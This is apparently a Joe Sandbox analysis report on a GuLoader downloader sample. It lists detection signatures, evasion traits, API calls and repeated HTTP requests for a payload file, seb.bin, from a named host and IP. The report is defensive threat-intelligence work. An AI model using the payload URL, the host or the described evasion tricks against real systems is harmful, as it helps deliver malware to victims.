Edit tour

Windows Analysis Report
5WP9WCM8qV.exe

Overview

General Information

Sample name:	5WP9WCM8qV.exe renamed because original name is a hash value
Original sample name:	950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55.exe
Analysis ID:	1549406
MD5:	649ba11fd51e50393b1cf0f461b90cbf
SHA1:	99dc18ad322a073c6e17e5c129832f85f2092b6c
SHA256:	950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Machine Learning detection for sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

5WP9WCM8qV.exe (PID: 7864 cmdline: "C:\Users\user\Desktop\5WP9WCM8qV.exe" MD5: 649BA11FD51E50393B1CF0F461B90CBF)

5WP9WCM8qV.exe (PID: 8024 cmdline: "C:\Users\user\Desktop\5WP9WCM8qV.exe" MD5: 649BA11FD51E50393B1CF0F461B90CBF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1526284301.0000000006145000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.3280318515.0000000003565000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: 5WP9WCM8qV.exe PID: 7864	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:13:44.632588+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.8	49706	TCP
2024-11-05T16:14:23.191975+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.8	49712	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:13:48.306164+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49708	45.33.20.235	80	TCP
2024-11-05T16:13:58.967249+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49709	45.33.20.235	80	TCP
2024-11-05T16:14:09.808561+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49710	45.33.20.235	80	TCP
2024-11-05T16:14:20.444838+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49711	45.33.20.235	80	TCP
2024-11-05T16:14:31.080249+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49713	45.33.20.235	80	TCP
2024-11-05T16:14:41.699854+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49714	45.33.20.235	80	TCP
2024-11-05T16:14:52.317635+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49715	45.33.20.235	80	TCP
2024-11-05T16:15:02.954283+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49716	45.33.20.235	80	TCP
2024-11-05T16:15:13.564833+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49717	45.33.20.235	80	TCP
2024-11-05T16:15:24.173235+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49718	45.33.20.235	80	TCP
2024-11-05T16:15:34.802466+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49719	45.33.20.235	80	TCP
2024-11-05T16:15:45.435578+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49720	45.33.20.235	80	TCP
2024-11-05T16:15:56.075437+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49721	45.33.20.235	80	TCP
2024-11-05T16:16:06.684759+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49722	45.33.20.235	80	TCP
2024-11-05T16:16:17.305113+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49723	45.33.20.235	80	TCP
2024-11-05T16:16:27.980874+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49724	45.33.20.235	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5WP9WCM8qV.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: 5WP9WCM8qV.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 5WP9WCM8qV.exe

Joe Sandbox ML: detected

Source: 5WP9WCM8qV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 5WP9WCM8qV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: mshtml.pdbUGP source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: Joe Sandbox View	IP Address: 45.33.20.235 45.33.20.235
Source: Joe Sandbox View	IP Address: 45.33.20.235 45.33.20.235

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49717 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49716 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49710 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49721 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49720 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49722 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49719 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49714 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49724 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49713 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49723 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49718 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49715 -> 45.33.20.235:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49712
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49706

Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /seb.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: jm.ybo13.za.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: jm.ybo13.za.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:47 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:47 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:47 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:13:58 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:09 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:20 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:31 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:41 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:14:52 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:02 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:13 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:24 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:34 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:45 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:15:56 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:16:06 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:16:17 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 05 Nov 2024 15:16:27 GMTcontent-type: text/htmlcontent-length: 1x-fail-reason: Bad Extensionconnection: closeData Raw: 20 Data Ascii:

Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.bin
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.bin&4r
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.bin2476756634-1003q
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.bin7
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.bin?
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binR4
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binU4C
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binZ
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.bing4
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binlI
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binm4
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binp4
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binshqos.dll.mui
Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jm.ybo13.za.com/seb.binza.com/seb.bin
Source: 5WP9WCM8qV.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052F3

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004032A0

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_00407041	0_2_00407041
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_0040686A	0_2_0040686A
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_00404B30	0_2_00404B30

Source: 5WP9WCM8qV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.troj.evad.winEXE@3/9@1/1

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

0_2_004032A0

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045B4

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

File created: C:\Users\user\AppData\Roaming\lsrivelserne

Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

File created: C:\Users\user\AppData\Local\Temp\nsv1D39.tmp

Jump to behavior

Source: 5WP9WCM8qV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5WP9WCM8qV.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

File read: C:\Users\user\Desktop\5WP9WCM8qV.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"
